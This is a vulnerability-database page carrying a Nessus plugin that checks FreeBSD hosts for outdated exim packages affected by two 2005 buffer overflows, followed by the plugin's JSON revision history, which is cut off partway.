Search...

FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)

2005-07-13T00:00:00

ID FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL
Type nessus
Reporter Tenable
Modified 2018-11-23T00:00:00

Description

The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.

The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were  
# extracted from the FreeBSD VuXML database :
#
# Copyright 2003-2018 Jacques Vidrine and contributors
#
# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
# HTML, PDF, PostScript, RTF and so forth) with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code (VuXML) must retain the above
#    copyright notice, this list of conditions and the following
#    disclaimer as the first lines of this file unmodified.
# 2. Redistributions in compiled form (transformed to other DTDs,
#    published online in any format, converted to PDF, PostScript,
#    RTF and other formats) must reproduce the above copyright
#    notice, this list of conditions and the following disclaimer
#    in the documentation and/or other materials provided with the
#    distribution.
# 
# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#

include("compat.inc");

if (description)
{
  script_id(19118);
  script_version("1.19");
  script_cvs_date("Date: 2018/11/23 12:49:57");

  script_cve_id("CVE-2005-0021", "CVE-2005-0022");
  script_bugtraq_id(12185, 12188, 12268);

  script_name(english:"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)");
  script_summary(english:"Checks for updated packages in pkg_info output");

  script_set_attribute(
    attribute:"synopsis", 
    value:
"The remote FreeBSD host is missing one or more security-related
updates."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"1. The function host_aton() can overflow a buffer if it is presented
with an illegal IPv6 address that has more than 8 components.

2. The second report described a buffer overflow in the function
spa_base64_to_bits(), which is part of the code for SPA
authentication."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html"
  );
  # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377
  script_set_attribute(
    attribute:"see_also",
    value:"https://marc.info/?l=bugtraq&m=110573573800377"
  );
  # https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?60fdf1ac"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim-ldap");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim-ldap2");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim-mysql");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim-postgresql");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:exim-sa-exim");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/01/05");
  script_set_attribute(attribute:"patch_publication_date", value:"2005/01/05");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/13");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"FreeBSD Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");

  exit(0);
}


include("audit.inc");
include("freebsd_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (pkg_test(save_report:TRUE, pkg:"exim&lt;4.43+28_1")) flag++;
if (pkg_test(save_report:TRUE, pkg:"exim-ldap&lt;4.43+28_1")) flag++;
if (pkg_test(save_report:TRUE, pkg:"exim-ldap2&lt;4.43+28_1")) flag++;
if (pkg_test(save_report:TRUE, pkg:"exim-mysql&lt;4.43+28_1")) flag++;
if (pkg_test(save_report:TRUE, pkg:"exim-postgresql&lt;4.43+28_1")) flag++;
if (pkg_test(save_report:TRUE, pkg:"exim-sa-exim&lt;4.43+28_1")) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:pkg_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "bulletinFamily": "scanner", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "published": "2005-07-13T00:00:00", "modified": "2018-11-23T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "reporter": "Tenable", "references": ["https://marc.info/?l=bugtraq&m=110573573800377", "http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?60fdf1ac"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "type": "nessus", "lastseen": "2019-02-21T01:08:40", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "f5ca5f3e61266bee4ca07e961c1e56cd9ab0a3fe3964b4f796e58ea1d593b952", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cdf641b8180b4b9325d01eea40450b5e", "key": "references"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3c764d4cf584f9ded7aa4dcca57c78ff", "key": "modified"}, {"hash": "05087e0912dd2f79047b7dad601a2083", "key": "sourceData"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2018-11-13T17:07:16", "modified": "2018-11-10T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?60fdf1ac", "http://marc.info/?l=bugtraq&m=110573573800377"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/11/10 11:49:40\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fdf1ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["references", "modified", "sourceData"], "edition": 6, "lastseen": "2018-11-13T17:07:16"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented with an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function spa_base64_to_bits(), which is part of the code for SPA authentication.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "16815c800a3c847b124ff6cb5bc842e9837966a0b192fe482682aa2021e78082", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "767faad1c1a0bac1dea68a1424024c69", "key": "sourceData"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "a2c4080bb75aa646d3d46cc3e994631a", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "09cd0998f21b6811e8f5438ddcb628f2", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}, {"hash": "55b5f288c0c073cab7832e1f46b617e7", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2018-11-24T03:30:41", "modified": "2018-11-23T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["https://marc.info/?l=bugtraq&m=110573573800377", "http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?60fdf1ac"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19118);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/23 12:49:57\");\n\n script_cve_id(\"CVE-2005-0021\", \"CVE-2005-0022\");\n script_bugtraq_id(12185, 12188, 12268);\n\n script_name(english:\"FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html\"\n );\n # http://marc.theaimsgroup.com/?l=bugtraq&m=110573573800377\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=bugtraq&m=110573573800377\"\n );\n # https://vuxml.freebsd.org/freebsd/ca9ce879-5ebb-11d9-a01c-0050569f0001.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fdf1ac\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-ldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim-sa-exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-ldap2<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-mysql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-postgresql<4.43+28_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"exim-sa-exim<4.43+28_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "FreeBSD : exim -- two buffer overflow vulnerabilities (ca9ce879-5ebb-11d9-a01c-0050569f0001)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 7, "lastseen": "2018-11-24T03:30:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:freebsd:freebsd:exim-ldap", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim-ldap2", "p-cpe:/a:freebsd:freebsd:exim-postgresql", "p-cpe:/a:freebsd:freebsd:exim-mysql", "p-cpe:/a:freebsd:freebsd:exim-sa-exim", "p-cpe:/a:freebsd:freebsd:exim"], "cvelist": ["CVE-2005-0022", "CVE-2005-0021"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "1. The function host_aton() can overflow a buffer if it is presented\nwith an illegal IPv6 address that has more than 8 components.\n\n2. The second report described a buffer overflow in the function\nspa_base64_to_bits(), which is part of the code for SPA\nauthentication.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-01-16T20:06:13", "references": [{"idList": ["RHSA-2005:025"], "type": "redhat"}, {"idList": ["CA9CE879-5EBB-11D9-A01C-0050569F0001"], "type": "freebsd"}, {"idList": ["OPENVAS:52252", "OPENVAS:53472", "OPENVAS:53474", "OPENVAS:54809"], "type": "openvas"}, {"idList": ["CVE-2005-0022", "CVE-2005-0021"], "type": "cve"}, {"idList": ["SECURITYVULNS:DOC:7533", "SECURITYVULNS:DOC:7534"], "type": "securityvulns"}, {"idList": ["GLSA-200501-23"], "type": "gentoo"}, {"idList": ["EDB-ID:1009", "EDB-ID:756"], "type": "exploitdb"}, {"idList": ["DEBIAN:DSA-637-1:4973F", "DEBIAN:DSA-635-1:15035"], "type": "debian"}, {"idList": ["VU:132992"], "type": "cert"}, {"idList": ["FEDORA_2005-002.NASL", "EXIM_SPA_IPV6_OVERFLOW.NASL", "UBUNTU_USN-56-1.NASL", "REDHAT-RHSA-2005-025.NASL", "DEBIAN_DSA-637.NASL", "DEBIAN_DSA-635.NASL", "FEDORA_2005-001.NASL", "GENTOO_GLSA-200501-23.NASL"], "type": "nessus"}, {"idList": ["OSVDB:12727", "OSVDB:12726", "OSVDB:12946"], "type": "osvdb"}, {"idList": ["USN-56-1"], "type": "ubuntu"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "8a38930a33717e1309ac2ed5e2bac59ec62215dd2f37ff719246f630cc49a581", "hashmap": [{"hash": "fe45aa727b58c1249bf04cfb7b4e6ae0", "key": "naslFamily"}, {"hash": "54fda255863604b985f16abe0a76639e", "key": "title"}, {"hash": "b09dad3a1a106eb7ecf8cc564c192cdc", "key": "cpe"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "767faad1c1a0bac1dea68a1424024c69", "key": "sourceData"}, {"hash": "9024ab754ee339f101e22cbcc0c75129", "key": "published"}, {"hash": "a465375bd0bb0c7e72e35caa1f150831", "key": "description"}, {"hash": "cc34f605458c15226bb56a2d79f3d62c", "key": "pluginID"}, {"hash": "c4c9410778877f2ff6b63b54f4a33cb5", "key": "href"}, {"hash": "09cd0998f21b6811e8f5438ddcb628f2", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "56682bdf77751f0db7701f0a4be98d1e", "key": "cvelist"}, {"hash": "55b5f288c0c073cab7832e1f46b617e7", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=19118", "id": "FREEBSD_PKG_CA9CE8795EBB11D9A01C0050569F0001.NASL", "lastseen": "2019-01-16T20:06:13", "modified": "2018-11-23T00:00:00", "naslFamily": "FreeBSD Local Security Checks", "objectVersion": "1.3", "pluginID": "19118", "published": "2005-07-13T00:00:00", "references": ["https://marc.info/?l=bugtraq&m=110573573800377", "http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html", "http://www.nessus.org/u?60fdf1ac"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to 